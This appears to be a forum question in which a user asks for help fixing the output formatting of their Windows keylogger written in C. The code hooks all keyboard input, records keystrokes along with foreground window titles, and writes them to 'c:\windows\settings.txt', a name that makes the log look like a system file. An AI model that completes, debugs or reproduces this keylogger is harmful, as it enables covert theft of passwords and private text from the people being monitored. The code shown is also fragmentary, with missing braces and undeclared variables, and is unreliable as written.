
I'm trying append more characters to a txt file after write title of foreground window and a newline character, but after first character, the next appear after a newline. Here is result => http://prntscr.com/3de8vt and here is my code:

I'm using Dev C++ compiler.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

using namespace std;

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
void log(char *str);
char *translate(int vk, int up);

int shift = 0, caps = 0;
FILE *fd;

int main(int argc, char *argv[]) {

    HINSTANCE app = GetModuleHandle(NULL);
    SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, app, 0);
    MSG msg;
    const char *fname;
    fname = "c:\\windows\\settings.txt";
    fd = fopen(fname, "a");
    while (GetMessage(&msg, NULL, 0, 0) > 0) {

    return 0;

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {

char window_text[500];
char old_window_text[500];
HWND fore_hndl = GetForegroundWindow();


    char *str="";
    char *str_window=""; 

    if (wParam == WM_KEYUP) {
        str = translate(kb->vkCode, 1);
    } else if (wParam == WM_KEYDOWN) {

           if (fore_hndl != NULL) {
              if (GetWindowText(fore_hndl, (char*)&window_text, 499) != 0) {
                 if (strcmp(window_text, old_window_text) != 0) {

                    str_window = window_text;

                   strcpy(old_window_text, window_text);

        str = translate(kb->vkCode, 0);

    if (str_window) 

    log("\n");         // snippet problematical for print in txt file as I haved said

    if (str) 

    return 0;

void log(char *str) {

    fwrite(str, 1, strlen(str), fd);
    if (strstr(str," ") || strstr(str,"[CR]")) fflush(fd);

char* translate(int vk, int up) {

char window_text[500];
char old_window_text[500];
HWND fore_hndl = GetForegroundWindow();

    if (up) {
        if ((vk == 0x10) || (vk == 0xa0) || (vk == 0xa1)) shift = 0;
        return 0;
    } else if ((vk==0x10)||(vk==0xa0)||(vk==0xa1)) {
        shift=1; return 0;

    char *buf = (char*)malloc(16);
    memset(buf, 0, 16);

    if (vk < 0x29) {

        switch (vk) {
            case 0x08: strcpy(buf, "[BS]"); break;
            case 0x09: strcpy(buf, "\t"); break;
            case 0x0D: strcpy(buf, "\n"); break;
            case 0x14: caps ^= 1; break;
            case 0x20: buf[0] = ' '; break;
        return buf;

        if (vk > 0x69 && vk < 0x70) {
            buf[0] = (char)(vk - 0x40);
        } else if (vk > 0x6f && vk < 0x88) {
            sprintf(buf, "[F%d]", vk - 0x6f);
        } else if (isalpha(vk)) {
            if (!caps)
                if (shift) { buf[0] = (char)(toupper(vk)); } else { buf[0] = (char)(tolower(vk)); }
                if (!shift) { buf[0] = (char)(toupper(vk)); } else { buf[0] = (char)(tolower(vk)); }
        } else {
            switch (vk) {
            case '1': if (!shift) {buf[0]=(char)vk;} else {buf[0]='!';} break;
            case '2': if (!shift) {buf[0]=(char)vk;} else {buf[0]='@';} break;
            case '3': if (!shift) {buf[0]=(char)vk;} else {buf[0]='#';} break;
            case '4': if (!shift) {buf[0]=(char)vk;} else {buf[0]='$';} break;
            case '5': if (!shift) {buf[0]=(char)vk;} else {buf[0]='%';} break;
            case '6': if (!shift) {buf[0]=(char)vk;} else {buf[0]='^';} break;
            case '7': if (!shift) {buf[0]=(char)vk;} else {buf[0]='&';} break;
            case '8': if (!shift) {buf[0]=(char)vk;} else {buf[0]='*';} break;
            case '9': if (!shift) {buf[0]=(char)vk;} else {buf[0]='(';} break;
            case '0': if (!shift) {buf[0]=(char)vk;} else {buf[0]=')';} break;
            case 0xba: if (!shift) {buf[0]=';';} else {buf[0]=':';} break;
            case 0xbb: if (!shift) {buf[0]='=';} else {buf[0]='+';} break;
            case 0xbc: if (!shift) {buf[0]=',';} else {buf[0]='<';} break;
            case 0xbd: if (!shift) {buf[0]='-';} else {buf[0]='_';} break;
            case 0xbe: if (!shift) {buf[0]='.';} else {buf[0]='>';} break;
            case 0xbf: if (!shift) {buf[0]='/';} else {buf[0]='?';} break;
            case 0xc0: if (!shift) {buf[0]='`';} else {buf[0]='~';} break;
            case 0xdb: if (!shift) {buf[0]='[';} else {buf[0]='{';} break;
            case 0xdc: if (!shift) {buf[0]='\\';} else {buf[0]='|';} break;
            case 0xdd: if (!shift) {buf[0]=']';} else {buf[0]='}';} break;
            case 0xde: if (!shift) {buf[0]='\'';} else {buf[0]='\"';} break;
    return buf;
I have made some changes for this =>

if (str_window) 



    if (str) 

    return 0;
Now print only first character in digitation after title of active window. Still printing wrong see => http://prntscr.com/3df8n5. Word "good" as sample.

Any suggestion will appreciated. Thanks in advanced!